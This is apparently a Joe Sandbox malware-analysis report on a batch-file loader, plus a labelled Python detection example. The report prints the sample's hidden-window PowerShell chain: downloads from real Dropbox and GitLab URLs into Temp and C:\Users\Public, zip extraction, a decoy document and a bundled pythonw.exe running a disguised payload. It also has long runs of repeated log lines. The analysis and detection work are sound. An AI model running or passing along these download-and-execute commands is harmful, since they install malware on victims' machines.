              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb" source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1546000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.2212283273.000001F3F17AE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\dll\System.Core.pdb source: powershell.exe, 0000000E.00000002.2324464767.00000254F15AD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.IO.Compression.FileSystem.pdbH source: powershell.exe, 00000010.00000002.2353641518.000002440223A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.pdb source: powershell.exe, 00000010.00000002.2475239651.000002441C3D1000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match, file source: hnl2bose13.bat, type: SAMPLE
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD349923EC push 8B485F91h; iretd 16_2_00007FFD349923F1
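              Added detection example, not part of the Joe Sandbox report. The five PowerShell command lines listed under Data Obfuscation form one staging chain: a hidden-window WebClient.DownloadFile into the user's Temp folder and into C:\Users\Public, a decoy .docx opened with Start-Process, ZipFile::ExtractToDirectory run on the archive in C:\Users\Public, and a bundled pythonw.exe launched from the extracted folder with a payload named rz_317.pd rather than a .py file. The two download commands repeated under Persistence and Installation Behavior are the same first and third stages of that chain. The Python below runs a small rule set over constructed process-creation events carrying those exact command lines and correlates the hits per parent PID, so the chain scores high only when download, extraction and interpreter launch all land in a staging directory under one parent. The event layout, the parent PIDs (1000 for the batch file's cmd.exe, 2000 for a control) and the benign C:\Tools download used as that control are assumptions, not data from the report.

```python
"""Detect the download -> extract -> bundled-interpreter chain seen in the report.

Added example, not part of the Joe Sandbox report. Event layout and PIDs are
assumed; the command lines are the ones listed in the report.
"""
import re
from collections import defaultdict

# User-writable staging directories the chain writes to (Temp and C:\Users\Public).
STAGING_DIRS = re.compile(
    r"(?i)C:[\\/]+Users[\\/]+(?:Public|[^\\/]+[\\/]+AppData[\\/]+Local[\\/]+Temp)")

RULES = {
    # Sigma "PowerShell DownloadFile": .NET WebClient used as a downloader.
    "ps_downloadfile": re.compile(r"(?i)System\.Net\.WebClient.*\.DownloadFile\s*\("),
    # Stager keeps its console off-screen.
    "ps_hidden": re.compile(r"(?i)-WindowStyle\s+Hidden"),
    # .NET zip extraction instead of Expand-Archive.
    "ps_zip_extract": re.compile(r"(?i)ZipFile\]::ExtractToDirectory\s*\("),
    # Decoy document opened so the victim sees something plausible.
    "ps_open_decoy": re.compile(r"(?i)Start-Process\s+'[^']+\.(?:docx?|pdf|xlsx?)'"),
    # Python interpreter run out of C:\Users\Public; group 1 is the script argument.
    "python_from_public": re.compile(
        r"(?i)C:[\\/]+Users[\\/]+Public[\\/].*?pythonw?\.exe\s+(\S+)"),
}


def classify(cmdline: str) -> set:
    """Return the set of rule names that match one process command line."""
    tags = set()
    for name, rx in RULES.items():
        m = rx.search(cmdline)
        if not m:
            continue
        tags.add(name)
        # A "Python" payload that is not a .py file (rz_317.pd here) is masquerading.
        if name == "python_from_public" and not m.group(1).lower().endswith(".py"):
            tags.add("python_nonpy_payload")
    # Only downloads/extractions that land in a staging dir count toward the chain;
    # an admin pulling a tool into C:\Tools should not.
    if tags & {"ps_downloadfile", "ps_zip_extract"} and STAGING_DIRS.search(cmdline):
        tags.add("writes_staging_dir")
    return tags


CHAIN_STAGES = ("ps_downloadfile", "ps_zip_extract", "python_nonpy_payload")


def correlate(events) -> dict:
    """Merge tags per parent PID and score the chain: {ppid: verdict string}."""
    by_parent = defaultdict(set)
    for ev in events:
        by_parent[ev["ppid"]] |= classify(ev["cmdline"])
    verdicts = {}
    for ppid, tags in by_parent.items():
        stages = [s for s in CHAIN_STAGES if s in tags]
        if len(stages) == len(CHAIN_STAGES) and "writes_staging_dir" in tags:
            verdicts[ppid] = "high: download, extract and interpreter launch from staging dir"
        elif stages:
            verdicts[ppid] = "medium: " + ", ".join(stages)
        else:
            verdicts[ppid] = "none"
    return verdicts


# Constructed process-creation events. ppid 1000 stands for the cmd.exe that ran the
# .bat (assumed); its five command lines are copied from the report. ppid 2000 is a
# benign control (assumed) that shows the staging-directory filter.
SAMPLE_EVENTS = [
    {"ppid": 2000, "cmdline": r'''powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('https://example.invalid/tool.zip', 'C:\Tools\tool.zip')"'''},
    {"ppid": 1000, "cmdline": r'''powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"'''},
    {"ppid": 1000, "cmdline": r'''powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"'''},
    {"ppid": 1000, "cmdline": r'''powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"'''},
    {"ppid": 1000, "cmdline": r'''powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"'''},
    {"ppid": 1000, "cmdline": r'''powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"'''},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["ppid"], sorted(classify(ev["cmdline"])))
    print(correlate(SAMPLE_EVENTS))
```

              The per-parent correlation is what separates this chain from the individual Sigma hits the report lists (PowerShell DownloadFile, PowerShell Web Download): any one of the five command lines on its own is something an administrator might run, but download, .NET zip extraction and a Python interpreter started from C:\Users\Public under the same cmd.exe parent is the loader pattern. The control event shows that a WebClient download into a non-staging directory scores only medium.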

              Persistence and Installation Behavior

              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
